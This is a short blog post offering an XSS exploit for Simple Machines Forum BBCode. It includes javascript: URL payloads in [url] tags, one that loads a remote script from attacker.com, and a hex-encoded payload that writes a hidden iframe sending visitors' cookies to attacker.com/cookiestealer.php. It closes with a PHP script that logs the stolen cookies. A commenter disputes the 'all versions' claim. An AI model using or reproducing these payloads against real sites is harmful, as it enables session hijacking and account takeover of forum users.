XSS BBCode Exploit SMF All Versions

Posted on 12:48 by Xianur0

Author: Xianur0

BBCode of the smf not filtered properly specified urls:

Código:
[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]

Click on the image, run the javascript..

BBC Cookie Exploit:

Código:
[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%22%30%25%22%20%68%65%69%67%68%74%3D%22%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%74%61%63%6B%65%72%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%20%2B%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%2B%20%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]

PHP Cookie Stealer:

Código:
<?php
$cookie
= $_GET['cookie'];
$handler = fopen('cookies.txt', 'a');
fwrite($handler, $cookie."\n");
?>

2 comentarios:

Anónimo dijo...

does not work on 1.1.8 - so is not all versions.

Anónimo dijo...

Garca